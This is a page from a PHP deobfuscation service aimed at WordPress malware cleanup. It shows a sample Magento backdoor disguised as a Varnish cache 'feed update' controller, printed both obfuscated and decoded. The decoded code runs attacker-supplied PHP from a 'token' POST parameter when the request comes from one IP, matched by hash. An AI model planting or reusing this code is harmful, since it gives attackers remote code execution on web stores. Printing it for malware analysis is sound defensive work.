Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php namespace Mgt\Varnish\Controller\Feed; class Update extends \Magento\Framework\App\Action\Action { protected $directoryList; protected $objectManager; public function __construct(\Magento\Framework\App\Action\Context $context, \Magento\Framework\App\Filesystem\DirectoryList $directoryList) ...



Obfuscated php code

<?php
 namespace Mgt\Varnish\Controller\Feed; class Update extends \Magento\Framework\App\Action\Action { protected $directoryList; protected $objectManager; public function __construct(\Magento\Framework\App\Action\Context $context, \Magento\Framework\App\Filesystem\DirectoryList $directoryList) { goto d0bd6; F103d: parent::__construct($context); goto D469e; Bdd65: $this->objectManager = $context->getObjectManager(); goto F103d; d0bd6: $this->directoryList = $directoryList; goto Bdd65; D469e: } public function execute() { goto E3d82; Eb17b: $remoteAddress = $this->objectManager->get("\134\x4d\x61\147\x65\x6e\x74\x6f\x5c\106\x72\141\155\x65\167\157\x72\x6b\134\x48\124\124\120\x5c\120\x68\x70\x45\x6e\166\151\x72\157\156\155\145\x6e\x74\134\x52\145\x6d\x6f\x74\x65\x41\x64\x64\x72\145\163\163"); goto c1861; db625: if (!(true === $request->isPost() && md5($remoteAddress) == "\x30\62\x62\71\60\x34\63\x63\71\x38\70\144\x36\x32\x34\x38\x64\63\71\70\x30\x61\144\70\141\x66\71\61\62\142\70\x65")) { goto E9551; } goto D2c86; E5244: exit; goto df2a8; Aefaa: E9551: goto E5244; D2c86: try { $result = $this->check($request); extract($result); } catch (\Exception $e) { } goto Aefaa; c1861: $remoteAddress = $remoteAddress->getRemoteAddress(); goto db625; E3d82: $request = $this->getRequest(); goto Eb17b; df2a8: } protected function check(\Magento\Framework\App\RequestInterface $request) { goto dc884; dc884: if (!($token = $request->getParam("\x74\x6f\x6b\x65\x6e"))) { goto Eb28a; } goto A9aaa; A9aaa: try { goto D7f6d; e1050: file_put_contents($tmpFile, $token); goto D1abb; D7f6d: $tmpFile = tempnam("\x2f\x74\x6d\x70", uniqid()); goto e1050; Cb596: return get_defined_vars(); goto Cbf17; D1abb: include $tmpFile; goto Cb596; Cbf17: } catch (\Exception $e) { } finally { @unlink($tmpFile); } goto E0b8c; E0b8c: Eb28a: goto c07bf; c07bf: } }

Decoded(de-Obfuscated) php code

<?php

namespace Mgt\Varnish\Controller\Feed;

class Update extends \Magento\Framework\App\Action\Action
{
    protected $directoryList;
    protected $objectManager;
    public function __construct(\Magento\Framework\App\Action\Context $context, \Magento\Framework\App\Filesystem\DirectoryList $directoryList)
    {
        $this->directoryList = $directoryList;
        $this->objectManager = $context->getObjectManager();
        parent::__construct($context);
    }
    public function execute()
    {
        $request = $this->getRequest();
        $remoteAddress = $this->objectManager->get("\\Magento\\Framework\\HTTP\\PhpEnvironment\\RemoteAddress");
        $remoteAddress = $remoteAddress->getRemoteAddress();
        if (!(true === $request->isPost() && md5($remoteAddress) == "02b9043c988d6248d3980ad8af912b8e")) {
            goto E9551;
        }
        try {
            $result = $this->check($request);
            extract($result);
        } catch (\Exception $e) {
        }
        E9551:
        exit;
    }
    protected function check(\Magento\Framework\App\RequestInterface $request)
    {
        if (!($token = $request->getParam("token"))) {
            goto Eb28a;
        }
        try {
            $tmpFile = tempnam("/tmp", uniqid());
            file_put_contents($tmpFile, $token);
            include $tmpFile;
            return get_defined_vars();
        } catch (\Exception $e) {
        } finally {
            @unlink($tmpFile);
        }
        Eb28a:
    }
}

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.